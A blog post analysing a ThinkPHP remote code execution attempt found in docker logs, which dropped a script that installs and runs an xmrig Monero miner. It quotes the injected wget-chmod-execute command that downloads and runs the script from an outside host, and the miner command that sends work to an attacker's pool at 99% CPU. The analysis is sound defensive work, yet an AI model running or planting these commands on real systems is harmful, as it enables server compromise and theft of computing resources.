I was recently looking through some docker logs for a web server container and I saw some suspicious commands being passed to the web server. It was very obvious with a quick glance that it was a hacker trying to compromise the web server. Out of curiosity, I decided to reverse engineer their process to figure out what they were actually attempting to do. This article explains in detail how a hacker can exploit a web server, set up a miner (xmrig) and profit from this.
During this request, they are trying to compromise the web server through the ThinkPHP remote code execution bug. If they are successful using an exploit to invoke shell script they can easily gain access to the web server. This exploit will allow the hacker the ability to run shell commands to download the a_thk.sh shell script.
The command that was being injected was:
Using a URL decoder it becomes much easier to read….
wget http://220.127.116.11/a_thk.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a;
This command pulls the a_thk.sh shell script from the web server 18.104.22.168
-O /tmp/a – creates it in a local temp folder.
Then the chmod 0777 grants full execute access on this script.
Then it executes the a_thk.sh shell script.
The Payload (a_thk.sh)
Out of curiosity I decided to pull their shell script and see what it was all about.
This script runs repetitively using a while loop. The general premise of this script is to continuously check to see if the xmrig_s mining program is running in memory. If it is not running in memory then it will download, install and configure the miner.
Breaking the payload down…
If the xmrig_s script is running then the shell script runs this command to run the Monero cryptocurrency miner using 99% of the CPU to push the mining profits to this IP address: 22.214.171.124:26590
xmrig_s -r 1000 –donate-level 1 -o 126.96.36.199:26590 -B -p pass -k –max-cpu-usage=99 –av=0;
Conclusion: X Marks the Spot
Using IP Geolocation I was able to track the requesting IP address to a Chinese Internet Service Provider (ISP). It appears as if the hacker or bot was located in Hangzhou, China. This may or may not be the true location of the hacker. While this is the requesting computer, this could be a VPN or a compromised computer that a hacker has control over and is operating a bot. Hackers can easily disguise their true location. My assumption is that the hacker/bot is operating in China. I believe this because their source website where the malware is also in Chinese.
Symantec has identified this malware
Symantec a software company that became famous for their virus scanning software during the 90’s has identified this malware as Miner.Xmrig.
With a quick search, I found the miner’s source code.
The Xmrig source code (C++) is located on GitHub and is open source.https://github.com/xmrig/xmrig
Monero Cryptocurrenty is their profit from this hack.
The hacker is most likely a bot that scans IP addresses and hacks the web server programmatically. If they can compromise as many web servers as possible, then they can actually profit from this endeavor.